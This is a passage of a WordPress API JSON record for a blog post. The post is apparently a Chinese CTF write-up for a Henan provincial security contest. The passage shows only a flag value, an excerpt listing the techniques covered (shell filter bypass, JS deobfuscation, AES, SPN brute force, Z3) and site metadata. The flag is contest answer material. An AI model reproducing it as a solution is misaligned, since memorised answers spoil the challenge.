class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{7a94faqe-e0a3-1qf0-8527-30050575612d-983f85d9-e0a3-11f0-88ca}<\/p>\n","protected":false},"excerpt":{"rendered":"Base64\u89e3\u7801\u3001\u6362\u8868\u5bc6\u7801\u3001Shell\u7ed5\u8fc7\u3001JS\u6df7\u6dc6\u4e0eAES\u89e3\u5bc6\u3001SPN\u7206\u7834\u4e0eZ3\u6c42\u89e3\u2014\u2014\u6cb3\u5357\u7701\u7b2c\u4e03\u5c4a\u91d1\u76fe\u4fe1\u5b89\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5bWriteUp\uff0c\u63ed\u79d8\u4e94\u5927\u9898\u76ee\u7684\u6838\u5fc3\u7834\u89e3\u601d\u8def\u4e0e\u5b9e\u6218\u811a\u672c\u3002","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[5,6],"tags":[],"class_list":["post-100","post","type-post","status-publish","format-standard","hentry","category-ctf","category-wp"],"_links":{"self":[{"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/posts\/100","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/comments?post=100"}],"version-history":[{"count":10,"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/posts\/100\/revisions"}],"predecessor-version":[{"id":115,"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/posts\/100\/revisions\/115"}],"wp:attachment":[{"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/media?parent=100"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/categories?post=100"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ichenfu.cn\/index.php\/wp-json\/wp\/v2\/tags?post=100"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}